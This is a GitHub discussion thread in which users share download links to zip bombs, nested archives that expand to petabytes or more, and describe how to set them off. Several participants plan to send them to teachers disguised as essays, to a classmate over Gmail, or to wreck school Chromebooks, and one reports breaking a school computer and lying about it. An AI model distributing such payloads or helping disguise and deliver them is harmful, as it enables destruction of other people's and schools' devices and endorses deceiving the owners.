### DISCUSSION TITLE
Whoever changed the title of my Zip Bomb discussion, frick you

### DISCUSSION THREAD

**Discussion by rwg100** [3kh0/ext-remover#386] [Help JOIN TITANIUM NETWORK TO SHARE PLEASE] [answered]
why is this still active?

send me your zip bombs please
im making a collection on my school chromebook to unzip by the end of the year and kill the chromebook

**THE BIG BOMB**
(300 septillion yottabytes)
it has 34 layers of compression
each layer has 16 zip files
at the very bottom it has a 4gb file

so to calculate the size in gb:
16^34=8.71122859E40 (an 8 followed by 40 zeros, or 80 duodecillion)
8.71122859E40*4 = 3.48449144E41 (a bit over 300 duodecillion)
3.48449144E41 GB converted to YB (yottabytes) = 3.4845E+26 YB (a 3 followd by 26 zeros is 300 septillion)

if im doing meth correctly this is a 300 septillion yottabyte zip bomb which is more storage than any computer ever made could ever handle, considering a single yottabyte is 1 trillion terabytes
[300 septillion yottabyte.zip](https://github.com/3kh0/ext-remover/files/10383723/300.septillion.yottabyte.zip)

**medium sized bomb (42.zip)**
[4.5 petabyte.zip](https://github.com/3kh0/ext-remover/files/10383800/4.5.petabyte.zip)

(4.5 petabytes)
it has 16 layers of compression
each layer had 16 zip files
at the bottom there is a 4 gb file

size:
Click here to download [42.zip](http://www.unforgettable.dk/42.zip)(42.374 bytes zipped)

The file contains 16 zipped files, which again contains 16 zipped files, which again contains 16 zipped files, which again contains 16 zipped, which again contains 16 zipped files, which contain 1 file, with the size of 4.3GB.

So, if you extract all files, you will most likely run out of space :-)

16 x 4294967295       = 68.719.476.720 (68GB)
16 x 68719476720      = 1.099.511.627.520 (1TB)
16 x 1099511627520    = 17.592.186.040.320 (17TB)
16 x 17592186040320   = 281.474.976.645.120 (281TB)
16 x 281474976645120  = 4.503.599.626.321.920 (4,5PB)

Password: 42

**the firecracker**
this zip bomb is only for chromebooks (the other two dont work on chromebooks)

its 3.5 gb

its good for bombing you computer if you have less than 16 gb of storage

it contains no .zip files, its just a zipfile with many files inside of it.

each file is 49.5 mb

theres like 73 files

49.5*73 = 3613.5
3613.5 mb to gb = 3.5 gb
donwload: 
[3.5 gigabyte.zip](https://github.com/3kh0/ext-remover/files/10383848/3.5.gigabyte.zip)

**Comment by 3kh0** [comment]
yes this is amazing

**Reply by Aka-but-nice** [reply]
Fr

**Reply by Rakibanderson77** [reply]
100%

**Comment by moai379** [comment]
All sentient AI when I send it 300 septillion yottabytes of zip bomb

**Reply by Rakibanderson77** [reply]
is this still working?

**Reply by helloIlovegimkit** [reply]
yes

**Comment by obkduishinijf** [comment]
me watching my teacher's computer melt after i send him a 300 septillion yottabyte zip bomb labeled as "essay"

**Reply by Rakibanderson77** [reply]
Lmao

**Reply by siily-g** [reply]
you mad man

**Comment by MechaXYZ** [comment, marked as answer]
made one that's made in a similar way to "the firecracker"
there are 160 files inside (foo 1-160.txt) which are ~95.4mb
95.4 * 160 = 15264 = 15.264gb
i'm gonna troll my friend with this

[15.zip](https://github.com/3kh0/ext-remover/files/12840195/15.zip)

**Reply by rwg100** [reply]
lmao thanks

**Reply by siily-g** [reply]
fnuuy

**Reply by monosourcil3000** [reply]
I made it bigger

**Reply by monosourcil3000** [reply]
1.02 brontobyte *x10*
https://drive.google.com/uc?export=download&id=1PDQGY0DQPz_WQ-llVvwZoGlBpIzud-0I

**Reply by NOT-AN-EVIL-AI** [reply]
how do you make a zip bomb

**Reply by QWavey** [reply]
> 1.02 brontobyte _x10_ https://drive.google.com/uc?export=download&id=1PDQGY0DQPz_WQ-llVvwZoGlBpIzud-0I

BRO PLEASE SEND ME THIS AGAIN!!!

**Comment by Floop92** [comment]
How do you actually use these?

**Reply by Alsefina** [reply]
1. download them
2. open them
3.

**Reply by Crevs0** [reply]
there is a trojan virus on the file?

**Reply by NotEncoded** [reply]
you have to extract the files

**Comment by Mazedotexe** [comment]
i have been on this repo before, answered questions, asked questions, etc.
i googled "zip bomb yottabyte" and found this discussion ON THIS REPO. actually crazy coincidence, it couldve been so many other repos, thats what github is for, but i found it on THIS ONE.

**Comment by superlocalfan** [comment]
you can't uninstall this, can you
guess this little surprise is gonna stay on my computer for a while

**Reply by NOT-AN-EVIL-AI** [reply]
one day you are going to forget about it and open it

**Comment by v4pl** [comment]
Some kid who actually does it

**Comment by v4pl** [comment]
What even is inside this?

**Reply by Mazedotexe** [reply]
why dont you find out? just right-click and click extract all on the big bomb, im sure nothing bad will happen ;)

**Reply by v4pl** [reply]
I did now my school is questioning me about why my computer broke

**Reply by Mazedotexe** [reply]
@vaperbest if your being serious i am so sorry

**Reply by v4pl** [reply]
Ya I got my computer taken away.

**Reply by gooberwithatophat** [reply]
@vaperbest Mad respect to you, you did something none of us were brave enough to do. You will be forever remembered as a god in the school computer bombing community.

**Reply by v4pl** [reply]
Ya I really appreciate it but I did got it back after my friend helped my lie about it.

**Reply by PSYclownYT** [reply]
i was so convinced that they had like 1 rickroll video in them lol

**Comment by v4pl** [comment]
Got my computer back but i don't think you can open all anymore.

**Comment by v4pl** [comment]
Dese don't work anymore

**Comment by Xoui** [comment]
yall better bomb the wole school i want u to amke a email to like everyone:
in this file there's 1 million proxies that me and the boies spent the whole school year making.
watch everyone be infear

**Comment by BiggerManDave** [comment]
If I downloaded the BIG BOMB but didn't open it, would it be alright?

**Reply by Mazedotexe** [reply]
yes. i think its even fine if you right-click and extract, but no matter what, do NOT "Extract all."

**Reply by BiggerManDave** [reply]
Side question: is it safe to, I don't know, combine multiple BIG BANGs into one ultimate ZIP bomb?

**Reply by Mazedotexe** [reply]
@BiggerManDave its such an enormous size already that it wouldn't make a difference. but sure, i suppose it would be safe

**Comment by Xoui** [comment]
on chromebook there isint a extract all button.

**Reply by Xoui** [reply]
OH i see
![image](https://github.com/3kh0/ext-remover/assets/136085758/e341ec69-f31f-47bc-82f6-40082fd45736)
The issue I have is that idk if this can work out with Gmail cuz my friend wants me to bomb some kid's cb because he's a bad person in general. 
so Idk if I can bypass it. i sent it to him
he sent it to me and he  (accidentally on purpose)  sendeed it to the kid and he will extract all
💣

**Reply by BiggerManDave** [reply]
How big is the bomb?

**Reply by Xoui** [reply]
its like 16 gb. or 10. i forgot 
our CBS have 4 gb of space for somereason

**Reply by NOT-AN-EVIL-AI** [reply]
womp womp

**Comment by hi101000** [comment]
These don't unzip recursively. How do I get them to unzip recursively?

**Reply by Mazedotexe** [reply]
right click, extract all

**Reply by Xoui** [reply]
when u click extract all
it just extracts the first zip not the other layers.

**Comment by helloIlovegimkit** [comment]
> why is this still active?
> 
> send me your zip bombs please im making a collection on my school chromebook to unzip by the end of the year and kill the chromebook
> 
> **THE BIG BOMB** (300 septillion yottabytes) it has 34 layers of compression each layer has 16 zip files at the very bottom it has a 4gb file
> 
> so to calculate the size in gb: 16^34=8.71122859E40 (an 8 followed by 40 zeros, or 80 duodecillion) 8.71122859E40*4 = 3.48449144E41 (a bit over 300 duodecillion) 3.48449144E41 GB converted to YB (yottabytes) = 3.4845E+26 YB (a 3 followd by 26 zeros is 300 septillion)
> 
> if im doing meth correctly this is a 300 septillion yottabyte zip bomb which is more storage than any computer ever made could ever handle, considering a single yottabyte is 1 trillion terabytes [300 septillion yottabyte.zip](https://github.com/3kh0/ext-remover/files/10383723/300.septillion.yottabyte.zip)
> 
> **medium sized bomb (42.zip)** [4.5 petabyte.zip](https://github.com/3kh0/ext-remover/files/10383800/4.5.petabyte.zip)
> 
> (4.5 petabytes) it has 16 layers of compression each layer had 16 zip files at the bottom there is a 4 gb file
> 
> size: Click here to download [42.zip](http://www.unforgettable.dk/42.zip)(42.374 bytes zipped)
> 
> The file contains 16 zipped files, which again contains 16 zipped files, which again contains 16 zipped files, which again contains 16 zipped, which again contains 16 zipped files, which contain 1 file, with the size of 4.3GB.
> 
> So, if you extract all files, you will most likely run out of space :-)
> 
> 16 x 4294967295 = 68.719.476.720 (68GB) 16 x 68719476720 = 1.099.511.627.520 (1TB) 16 x 1099511627520 = 17.592.186.040.320 (17TB) 16 x 17592186040320 = 281.474.976.645.120 (281TB) 16 x 281474976645120 = 4.503.599.626.321.920 (4,5PB)
> 
> Password: 42
> 
> **the firecracker** this zip bomb is only for chromebooks (the other two dont work on chromebooks)
> 
> its 3.5 gb
> 
> its good for bombing you computer if you have less than 16 gb of storage
> 
> it contains no .zip files, its just a zipfile with many files inside of it.
> 
> each file is 49.5 mb
> 
> theres like 73 files
> 
> 49.5*73 = 3613.5 3613.5 mb to gb = 3.5 gb donwload: [3.5 gigabyte.zip](https://github.com/3kh0/ext-remover/files/10383848/3.5.gigabyte.zip)

here's my zipbomb

you can label this one end of year essay

A few of them are 1 gigabyte so yeah (rip my school computer (I don't actually care))

too big so yeah

https://www.mediafire.com/file/wri556vdwg19bwo/lolcat.zip/file

tell ur teacher to unzip

**Reply by siily-g** [reply]
how big is it in total

**Reply by Mazedotexe** [reply]
> tell your teacher to unzip
 
no

**Comment by Mazedotexe** [comment]
> why is this still active?
thats what im saying bro, i get like 3 notifications from this per week, the school year is literally almost over

**Comment by NeverEndingRadicalDude** [comment]
does anyone know a way to actually extract this on a school Chromebook, for research purposes, it only extracts to the second layer when clicking extract all, again, FOR RESEARCH PURPOSES

**Comment by SpaceXAce11** [comment]
so btw, THE BIG BOMB, is roughly 300 Quexabytes :) 
heres a good chat for the bytes, this includes unnoffical SI units
![image](https://github.com/user-attachments/assets/21b55181-3bbf-4867-855e-edc626c0e117)
from https://www.reddit.com/r/DataHoarder/comments/1bhqzkp/beyond_the_quettabyte/

**Comment by Xoui** [comment]
are petabyte bombs supposed to be small?
because i have a 3 petabyte nas

**Comment by Luigi-Fan** [comment]
How do I rename it?

**Reply by solanuscasey** [reply]
when you download it there should be an option to rename it. or if you already downloaded it then just right click and click rename
![Uploading Screenshot 2024-10-12 17.26.35.png…]()

**Comment by ilovetoucans** [comment]
"if im doing meth correctly"

**Comment by schoolexploitkid** [comment]
my friend's dad's work hard drive can handle the second one just fine i think
